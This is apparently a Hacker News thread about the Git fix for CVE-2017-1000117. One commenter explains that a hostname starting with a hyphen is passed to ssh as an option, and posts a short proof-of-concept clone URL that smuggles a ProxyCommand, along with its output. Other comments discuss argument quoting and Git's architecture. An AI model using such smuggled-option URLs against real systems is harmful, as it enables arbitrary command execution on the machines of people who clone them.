
Git v2.14.1, v2.13.5, and others – security fix for CVE-2017-1000117 - ge0rg
https://www.mail-archive.com/linux-kernel@vger.kernel.org/msg1466490.html
======
jjnoakes
Is there a high level write up about this somewhere? I can't figure out off
the top of my head how a hostname that starts with a hyphen and gets mistaken
for an ssh option causes arbitrary local command execution. Wouldn't the first
word of the remote git command slide over and become the hostname?

~~~
cyphar
I haven't actually tried this, but I would assume that the exploit would
involve tricking Git into passing an ssh_config(5) option (though -o or
through -F) which then has a ProxyCommand or LocalCommand that will run on the
local machine.

EDIT: Yeah, here's a sample exploit. Popping a shell is left as an exercise to
the reader.

    
    
        % git version
        git version 2.14.0
        % git clone 'ssh://-o ProxyCommand=touch/foo'
        Cloning into 'foo'...
        Pseudo-terminal will not be allocated because stdin is not a terminal.
        touch: missing file operand
        Try 'touch --help' for more information.
        ssh_exchange_identification: Connection closed by remote host
        fatal: Could not read from remote repository.
    
        Please make sure you have the correct access rights
        and the repository exists.

------
belovedeagle
Could this not have been fixed by prefixing the '\--' argument on the command
line, and requiring that all ssh implementations must implement that in order
to be compatible?

Seriously, why are we still dealing with what amounts to a quoting issue in
2017?

~~~
cyphar
Because git is implemented as a series of scripts around some core C (or Perl)
programs. Really cool project, horrible architecture. I don't use Mercurial,
but it's kinda nice that they only use _one language_.

